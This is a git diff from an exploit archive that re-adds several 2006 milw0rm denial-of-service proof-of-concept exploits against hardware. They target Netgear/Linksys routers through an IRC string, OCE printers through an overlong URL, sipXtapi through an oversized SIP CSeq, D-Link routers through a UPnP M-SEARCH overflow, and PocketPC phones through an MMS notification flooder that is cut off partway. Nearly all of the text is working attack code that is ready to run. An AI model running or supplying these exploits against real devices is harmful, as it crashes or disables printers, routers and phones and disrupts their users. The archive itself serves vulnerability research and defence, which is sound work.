DoS PoC =-\n"); + printf (" Aaron Portnoy\n"); + printf (" deft () thunkers ! net \n"); + printf (" silc.thunkers.net, thunkers\n"); + printf ("----------------------------------\n"); + + + device ? printf ("\nDevice: \t%s\n", device) : + printf ("\nDevice: \t%s\n", DEVICE); + + pSRC ? printf ("SRC IP: \t%s\n", pSRC) : + printf ("SRC IP: \t%s\n", SRC_IP); + + pDST ? printf ("DST IP: \t%s\n", pDST) : + printf ("DST IP: \t%s\n", DST_IP); + + sPRT ? 
printf ("SPort: \t\t%d\n", sPRT) :
+ printf ("SPort: \t\t%d\n", SRC_PRT);
+
+ dPRT ? printf ("DPort: \t\t%d\n\n", dPRT) :
+ printf ("DPort: \t\t%d\n\n", DST_PRT);
+
+ for (i = 1; i <= 3; i++)
+ gen_packet (device, pSRC, pDST, sPRT, dPRT, i);
+ printf ("\n");
+
+ return (EXIT_SUCCESS);
+}
+
+// milw0rm.com [2006-02-14]
diff --git a/platforms/hardware/dos/1551.txt b/platforms/hardware/dos/1551.txt
index 027658d8b..8063c3f3c 100755
--- a/platforms/hardware/dos/1551.txt
+++ b/platforms/hardware/dos/1551.txt
@@ -1,14 +1,14 @@
-It appears that various routers are prone to an IRC-only DoS attack.
-Particularly Netgear and Linksys routers have been shown vulnerable.
-
-If a client behind one of the vulnerable routers connects to an IRC server on port 6667
-(and only 6667, does not DoS with other ports) and a user posts the following string
-in either a channel, private message, ctcp, notice, etc.. the router will drop the connection.
-The string is as follows:
-
-DCC SEND anylongrandomstringhere
-
-Further, it appears the routers that are vulnerable to this are running vxworks as their
-embedded OS. Older linux Linksys routers appear to be immune.
-
-# milw0rm.com [2006-03-04]
+It appears that various routers are prone to an IRC-only DoS attack.
+Particularly Netgear and Linksys routers have been shown vulnerable.
+
+If a client behind one of the vulnerable routers connects to an IRC server on port 6667
+(and only 6667, does not DoS with other ports) and a user posts the following string
+in either a channel, private message, ctcp, notice, etc.. the router will drop the connection.
+The string is as follows:
+
+DCC SEND anylongrandomstringhere
+
+Further, it appears the routers that are vulnerable to this are running vxworks as their
+embedded OS. Older linux Linksys routers appear to be immune.
+
+# milw0rm.com [2006-03-04]
diff --git a/platforms/hardware/dos/1718.pl b/platforms/hardware/dos/1718.pl
index bc96ba1cb..3f535e025 100755
--- a/platforms/hardware/dos/1718.pl
+++ b/platforms/hardware/dos/1718.pl 
@@ -1,69 +1,69 @@ -#!/usr/bin/perl -# -#OCE 3121/3122 Printer DoS Exploit -#---------------------------- -#By Herman Groeneveld aka sh4d0wman -#trancelover75 [AT] gmail.com -# -#Description: the printer runs a webserver to provide various printing tasks from -#java enabled browsers. Input is being filtered for bad characters. -#However it is vulnerable to a long url request. This will either reboot or crash the device. -# -#On crash, the "system" led on the printer changes from green to orange. No further printing is done -#until somebody resets the printer by flipping the powerswitch. E675 error displayed in printer display. -#On reboot, printing resumes after the device has completed it's reboot cycle. -# -#Crash is hard to accomplish. Play with the buffer input size. 261 worked at my printer. -#Values of 250/500/50000 are known to reboot the printer. No reliable size for crashing yet. -# -#Loop this exploit and printing will be nearly impossible. Tested: unhappy users. Not implemented. -# -#If you test this on your device, pls let me know the result. I had just 1 printer to test it at ;) -# -#Discovered: 29/03/2006 -#Target: tested against OCE 3121/3122 printer. -#Vendor: www.oce.com (no response) - - use IO::Socket; - - if (@ARGV != 3) - { - print " \n"; - print " #OCE 3121/3122 Printer DoS Exploit# \n"; - print "---------------------------------------------------------------\n"; - print " Usage: crashoce.pl \n"; - print " Example: new.pl 127.0.0.1 80 250 \n"; - print " Play with request length for reboot or crash effect. \n\n"; - print " #Coded by sh4d0wman 31/03/2006# \n"; - exit(1); - } - - $targetip =$ARGV[0]; #user input, no much fun in attacking 127.0.0.1 is it? 
- $targetport =$ARGV[1]; #user input since vendor might change this some day, unlikely though :-) - $reqlength = $ARGV[2]; #user input since different sizes give different results - - print "[-] OCE 3122 Printer DoS Exploit\n\n"; - print "[-] Target IP: "; - print $targetip; - print "\n[-] Connecting to target IP...\n"; - -$socket = IO::Socket::INET->new( - Proto => "tcp", - PeerAddr => "$targetip", - PeerPort => "$targetport"); unless ($socket) { die "- Could not connect. Check IP & port. Hint: default port is 80!\n"} - -print "[-] Connected to printer\n\n"; - -print "[-] Creating DoS request...\n"; - -$bufa='A'x$reqlength; #creating payload, length based on user input - -print "[-] Sending request...\n\n"; - -print $socket "GET /parser.exe?".$bufa.".html"." HTTP/1.1\r\n\r\n"; - sleep 5; #Be advised! Printer reaction to exploit can take up to 30 sec. Pls, be patient... - -print "[>]Attack completed! Printer in error state or rebooting.\n"; -close($socket); - -# milw0rm.com [2006-04-26] +#!/usr/bin/perl +# +#OCE 3121/3122 Printer DoS Exploit +#---------------------------- +#By Herman Groeneveld aka sh4d0wman +#trancelover75 [AT] gmail.com +# +#Description: the printer runs a webserver to provide various printing tasks from +#java enabled browsers. Input is being filtered for bad characters. +#However it is vulnerable to a long url request. This will either reboot or crash the device. +# +#On crash, the "system" led on the printer changes from green to orange. No further printing is done +#until somebody resets the printer by flipping the powerswitch. E675 error displayed in printer display. +#On reboot, printing resumes after the device has completed it's reboot cycle. +# +#Crash is hard to accomplish. Play with the buffer input size. 261 worked at my printer. +#Values of 250/500/50000 are known to reboot the printer. No reliable size for crashing yet. +# +#Loop this exploit and printing will be nearly impossible. Tested: unhappy users. Not implemented. 
+# +#If you test this on your device, pls let me know the result. I had just 1 printer to test it at ;) +# +#Discovered: 29/03/2006 +#Target: tested against OCE 3121/3122 printer. +#Vendor: www.oce.com (no response) + + use IO::Socket; + + if (@ARGV != 3) + { + print " \n"; + print " #OCE 3121/3122 Printer DoS Exploit# \n"; + print "---------------------------------------------------------------\n"; + print " Usage: crashoce.pl \n"; + print " Example: new.pl 127.0.0.1 80 250 \n"; + print " Play with request length for reboot or crash effect. \n\n"; + print " #Coded by sh4d0wman 31/03/2006# \n"; + exit(1); + } + + $targetip =$ARGV[0]; #user input, no much fun in attacking 127.0.0.1 is it? + $targetport =$ARGV[1]; #user input since vendor might change this some day, unlikely though :-) + $reqlength = $ARGV[2]; #user input since different sizes give different results + + print "[-] OCE 3122 Printer DoS Exploit\n\n"; + print "[-] Target IP: "; + print $targetip; + print "\n[-] Connecting to target IP...\n"; + +$socket = IO::Socket::INET->new( + Proto => "tcp", + PeerAddr => "$targetip", + PeerPort => "$targetport"); unless ($socket) { die "- Could not connect. Check IP & port. Hint: default port is 80!\n"} + +print "[-] Connected to printer\n\n"; + +print "[-] Creating DoS request...\n"; + +$bufa='A'x$reqlength; #creating payload, length based on user input + +print "[-] Sending request...\n\n"; + +print $socket "GET /parser.exe?".$bufa.".html"." HTTP/1.1\r\n\r\n"; + sleep 5; #Be advised! Printer reaction to exploit can take up to 30 sec. Pls, be patient... + +print "[>]Attack completed! Printer in error state or rebooting.\n"; +close($socket); + +# milw0rm.com [2006-04-26] diff --git a/platforms/hardware/dos/2000.pl b/platforms/hardware/dos/2000.pl index 8ef99fe8c..4306ab064 100755 --- a/platforms/hardware/dos/2000.pl +++ b/platforms/hardware/dos/2000.pl 
@@ -1,46 +1,46 @@ -#!/usr/bin/perl -# PoC Exploit By mthumann@ernw.de -# Remote Buffer Overflow in sipXtapi - -use IO::Socket; -#use strict; - - -print "sipXtapi Exploit by Michael Thumann \n\n"; - -if (not $ARGV[0]) { - print "Usage: sipx.pl \n"; -exit;} - -$target=$ARGV[0]; -my $source ="127.0.0.1"; -my $target_port = 5060; -my $user ="bad"; -my $eip="\x41\x41\x41\x41"; -my $cseq = -"\x31\x31\x35\x37\x39\x32\x30\x38". -"\x39\x32\x33\x37\x33\x31\x36\x31". -"\x39\x35\x34\x32\x33\x35\x37\x30". -$eip; -my $packet =<\r -Via: SIP/2.0/UDP $target:3277\r -From: "moz"\r -Call-ID: 3121$target\r -CSeq: $cseq\r -Max-Forwards: 70\r -Contact: \r -\r -END - -print "Sending Packet to: " . $target . "\n\n"; -socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); -my $ipaddr = inet_aton($target); -my $sendto = sockaddr_in($target_port,$ipaddr); -send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n"; -print "Done.\n"; - -#EoF - -# milw0rm.com [2006-07-10] +#!/usr/bin/perl +# PoC Exploit By mthumann@ernw.de +# Remote Buffer Overflow in sipXtapi + +use IO::Socket; +#use strict; + + +print "sipXtapi Exploit by Michael Thumann \n\n"; + +if (not $ARGV[0]) { + print "Usage: sipx.pl \n"; +exit;} + +$target=$ARGV[0]; +my $source ="127.0.0.1"; +my $target_port = 5060; +my $user ="bad"; +my $eip="\x41\x41\x41\x41"; +my $cseq = +"\x31\x31\x35\x37\x39\x32\x30\x38". +"\x39\x32\x33\x37\x33\x31\x36\x31". +"\x39\x35\x34\x32\x33\x35\x37\x30". +$eip; +my $packet =<\r +Via: SIP/2.0/UDP $target:3277\r +From: "moz"\r +Call-ID: 3121$target\r +CSeq: $cseq\r +Max-Forwards: 70\r +Contact: \r +\r +END + +print "Sending Packet to: " . $target . "\n\n"; +socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); +my $ipaddr = inet_aton($target); +my $sendto = sockaddr_in($target_port,$ipaddr); +send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n"; +print "Done.\n"; + +#EoF + +# milw0rm.com [2006-07-10] 
diff --git a/platforms/hardware/dos/2059.cpp b/platforms/hardware/dos/2059.cpp
index 17140b0ff..43b23ac24 100755
--- a/platforms/hardware/dos/2059.cpp
+++ b/platforms/hardware/dos/2059.cpp
@@ -1,87 +1,87 @@ -/* routers affected from eEye's advisory. /str0ke -Routers Affected: -DI-524 Rev A -DI-524 Rev C -DI-524 Rev D -DI-604 Rev E -DI-624 Rev C -DI-624 Rev D -DI-784 Rev A -EBR-2310 Rev A -WBR-1310 Rev A -WBR-2310 Rev A -*/ - -/* - * D-Link Router UPNP DOS PoC - * Written By: ub3rst4r aka DiGiTALST*R - * Tested Against: DI-524 Rev. A - * - * A remote stack overflow exists in a range of wired and wireless D-Link - * routers. This vulnerability allows an attacker to execute privileged code - * on an affected device. Although a stack overflow does exist, debugging this - * vulnerabilty requires additional external hardware. - * - * NOTE: You might need to try sending this twice, or use 239.255.255.250 - * - * Credits: eEye Digital Security - * - */ - -#include -#include -#pragma comment(lib,"ws2_32") - -int main(int argc, char **argv) -{ - WSADATA wsa; - - char buf[896]; - - int sockfd; - struct sockaddr_in serv_addr; - - int ret; - - if (argc < 2) { - printf("Usage: dlinkdos \n"); - return 0; - } - - WSAStartup(MAKEWORD(1,1), &wsa); - - // the main string - memcpy(buf, "M-SEARCH ", 9); - memset(buf+9, 'A', 800); - memcpy(buf+809, " HTTP/1.1\r\n", 10); - - // extra data - strcat(buf, - "Host:239.255.255.250:1900\r\n" - "ST:upnp:rootdevice\r\n" - "Man:\"ssdp:discover\"\r\n" - "MX:3\r\n" - "\r\n" - "\r\n"); - - sockfd = socket(AF_INET, SOCK_DGRAM, 0); - - serv_addr.sin_family = AF_INET; - serv_addr.sin_port = htons(1900); - serv_addr.sin_addr.s_addr = inet_addr(argv[1]); - memset(&serv_addr.sin_zero, '\0', 8); - - ret = sendto(sockfd,buf,sizeof(buf),0,(struct sockaddr *)&serv_addr, sizeof(struct sockaddr)); - if (ret <= 0) { - printf("failed to send request\n"); - return 0; - } - - printf("request sent!\n"); - - WSACleanup(); - - return 0; -} - -// milw0rm.com [2006-07-22] +/* routers affected from eEye's advisory. 
/str0ke +Routers Affected: +DI-524 Rev A +DI-524 Rev C +DI-524 Rev D +DI-604 Rev E +DI-624 Rev C +DI-624 Rev D +DI-784 Rev A +EBR-2310 Rev A +WBR-1310 Rev A +WBR-2310 Rev A +*/ + +/* + * D-Link Router UPNP DOS PoC + * Written By: ub3rst4r aka DiGiTALST*R + * Tested Against: DI-524 Rev. A + * + * A remote stack overflow exists in a range of wired and wireless D-Link + * routers. This vulnerability allows an attacker to execute privileged code + * on an affected device. Although a stack overflow does exist, debugging this + * vulnerabilty requires additional external hardware. + * + * NOTE: You might need to try sending this twice, or use 239.255.255.250 + * + * Credits: eEye Digital Security + * + */ + +#include +#include +#pragma comment(lib,"ws2_32") + +int main(int argc, char **argv) +{ + WSADATA wsa; + + char buf[896]; + + int sockfd; + struct sockaddr_in serv_addr; + + int ret; + + if (argc < 2) { + printf("Usage: dlinkdos \n"); + return 0; + } + + WSAStartup(MAKEWORD(1,1), &wsa); + + // the main string + memcpy(buf, "M-SEARCH ", 9); + memset(buf+9, 'A', 800); + memcpy(buf+809, " HTTP/1.1\r\n", 10); + + // extra data + strcat(buf, + "Host:239.255.255.250:1900\r\n" + "ST:upnp:rootdevice\r\n" + "Man:\"ssdp:discover\"\r\n" + "MX:3\r\n" + "\r\n" + "\r\n"); + + sockfd = socket(AF_INET, SOCK_DGRAM, 0); + + serv_addr.sin_family = AF_INET; + serv_addr.sin_port = htons(1900); + serv_addr.sin_addr.s_addr = inet_addr(argv[1]); + memset(&serv_addr.sin_zero, '\0', 8); + + ret = sendto(sockfd,buf,sizeof(buf),0,(struct sockaddr *)&serv_addr, sizeof(struct sockaddr)); + if (ret <= 0) { + printf("failed to send request\n"); + return 0; + } + + printf("request sent!\n"); + + WSACleanup(); + + return 0; +} + +// milw0rm.com [2006-07-22] diff --git a/platforms/hardware/dos/2156.c b/platforms/hardware/dos/2156.c index 744bcb07e..db1da1747 100755 --- a/platforms/hardware/dos/2156.c +++ b/platforms/hardware/dos/2156.c 
@@ -1,225 +1,225 @@ -/* - * This is a Proof-of-Concept tool to demonstrate the PocketPC MMS Composer - * flood/crash vulnerability (ab)using the WAPPush port UDP:2948 - * - * This is for educational purposes only! Please use responsible! - * - * (c) Collin Mulliner - * http://www.trifinite.org - * http://www.mulliner.org/pocketpc/ - * - * NotfiFlood - a Proof-of-Concept PocketPC MMS Composer flooder - * - *(c) Collin Mulliner - * - * http://www.mulliner.org/pocketpc/ - * http://www.trifinite.org/ - * - **** For educational purposes only! Please use responsible! *** - * - * NotiFlood is a PoC MMS M-notification.ind flooder written to demo the PocketPC - * MMS Composer vulnerabilities for my DEFCON-14 talk "Advanced Attacks Against - * PocketPC Phones". - * - * The tool sends MMS new message notifications to the target PocketPC device over - * WiFi IP:UDP4:2948. In flood mode the device plays the new message sound for - * every received notification. If auto receive is enabled the phone will try to - * dial-up GPRS in order to receive the message. After receiving a couple - * hundred messages the phone randomly freezes or rejects new messages. Further - * the MMS inbox is filled up with messages that only can be deleted manually - * one-by-one. In crash mode, each notification crashes the MMS client and - * therefore actively keeps the user from using the Inbox application while - * connected to WiFi (the Inbox application also handles email like via POP3 and - * IMAP). 
- * - * This was tested with WinCE 4.2x and MMS Composer 1.5 and 2.0 - * - * Examples: - * flood all clients in 192.168.1/24: - * notiflood -d 192.168.1.255 -n 0 - * - * crash client at: 192.168.42.29: - * notiflood -d 192.168.42.29 -i 500000 -n 1 -c - * - */ - -#include -#include -#include -#include -#include -//#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int mms1_pos[] = {40, 106, 167, 228, 289}; - -unsigned char mms1[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x97,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x96,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8e,0x66,0x68,0x32,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2
d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0xd0,0x00}; - -unsigned char mms2[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41
,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x97,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x96,0x1f,0x35,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41
,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00}; - -int mms2_pos[] = { 40, 314, 375, 436, 489 }; - -char to[100] = {"receiver@receiver.com"}; -char from[100] = {"sender@sender.net"}; -char subject[100] = {"Your P0ckEtPC just P00PED itself!"}; - -unsigned int iteration = 0; - -void iterate(unsigned char *nty, int *pos) -{ - char tmp[57]; - char tmp2[57]; - - sprintf(tmp, "%u%u", time(NULL), iteration); - memset(&nty[pos[0]], '0', 57); - memcpy(&nty[pos[0]], tmp, (strlen(tmp) < 57) ? strlen(tmp) : 56); - - sprintf(tmp2, "http://127.0.0.1/?%s",tmp); - memset(&nty[pos[4]], '0', 57); - memcpy(&nty[pos[4]], tmp2, (strlen(tmp2) < 57) ? strlen(tmp2) : 56); -} - - -void init(unsigned char *nty, int *pos) -{ - memset(&nty[pos[1]], ' ', 56); - memcpy(&nty[pos[1]], from, (strlen(from) < 57) ? strlen(from) : 56); - memset(&nty[pos[2]], ' ', 56); - memcpy(&nty[pos[2]], to, (strlen(to) < 57) ? strlen(to) : 56); - memset(&nty[pos[3]], ' ', 56); - memcpy(&nty[pos[3]], subject, (strlen(subject) < 57) ? 
strlen(subject) : 56); -} - -void usage() -{ - printf(""\ - "notiflood - proof-of-concept PocketPC MMS Composer m-notification.ind flooder\n\n"\ - " (c) 2006 Collin Mulliner \n"\ - " http://www.mulliner.org/pocketpc/ | http://www.trifinite.org\n\n"\ - " for educational purposes only, please use responsible!\n\n"\ - "options:\n"\ - "\t-d destination ip (broadcast works!)\n"\ - "\t-i interval (useconds)\n"\ - "\t-n number of packets (0=unlimited)\n"\ - "\t-s subject\n"\ - "\t-f from\n"\ - "\t-t to\n"\ - "\t-c crash client\n"\ - "\t-F flip-flop between crash / start client\n"\ - "\t-h help\n"\ - "\t-q quiet\n\n"); - -} - -int main(int argc, char **argv) -{ - int f, i, l = 0; - char system_cmd[200]; - int mode = 0; // 0 = flood , 1 = crash , 2 = flip-flop - int opt; - char dest[20] = {0}; - int interval = 500000; - unsigned int num = 0; - int verbose = 1; - int flipflop = 0; - - - while ((opt = getopt(argc, argv, "i:n:d:s:t:f:cqhF")) != EOF) { - switch (opt) { - case 'd': - strncpy(dest, optarg, 19); - break; - case 's': - strncpy(subject, optarg, 56); - break; - case 't': - strncpy(to, optarg, 56); - break; - case 'f': - strncpy(from, optarg, 56); - break; - case 'c': - mode = 1; - break; - case 'F': - mode = 2; - break; - case 'n': - num = atoi(optarg); - break; - case 'i': - interval = atoi(optarg); - break; - case 'q': - verbose = 0; - break; - default: - case 'h': - usage(); - break; - } - } - - if (optind < argc) { - usage(); - exit(-1); - } - if (strlen(dest) == 0) { - usage(); - exit(-1); - } - - sprintf(system_cmd, "cat mmsflood.fld|socat udp4:%s:2948,broadcast stdin &", dest); - - init(mms1, mms1_pos); - init(mms2, mms2_pos); - - if (verbose) { - printf("to: %s\n", to); - printf("from: %s\n", from); - printf("subject: %s\n", subject); - printf("dst-ip: %s\n", dest); - if (mode == 1) printf("crash client\n"); - else if (mode == 0) printf("fillup client inbox\n"); - else printf("flip-flop mode\n"); - printf("flood interval: %d seconds\n", interval); - 
printf("number of packets: %d (0=unlimited)\n", num); - } - - if (mode == 2) { - flipflop = 1; - } - - do { - iteration++; - f = open("mmsflood.fld", O_CREAT|O_RDWR|O_TRUNC, 00666); - if (mode == 0) { // flood - iterate(mms1, mms1_pos); - write(f, mms1, sizeof(mms1)); - } - else if (mode == 1) { // crash - iterate(mms2, mms2_pos); - write(f, mms2, sizeof(mms2)); - } - close(f); - system(system_cmd); - if (flipflop == 1) { - if (mode == 0) mode = 1; - else mode = 0; - } - if (interval > 0) usleep(interval); - } while ((iteration < num && num != 0) || num == 0); - - return(0); -} - -// milw0rm.com [2006-08-09] +/* + * This is a Proof-of-Concept tool to demonstrate the PocketPC MMS Composer + * flood/crash vulnerability (ab)using the WAPPush port UDP:2948 + * + * This is for educational purposes only! Please use responsible! + * + * (c) Collin Mulliner + * http://www.trifinite.org + * http://www.mulliner.org/pocketpc/ + * + * NotfiFlood - a Proof-of-Concept PocketPC MMS Composer flooder + * + *(c) Collin Mulliner + * + * 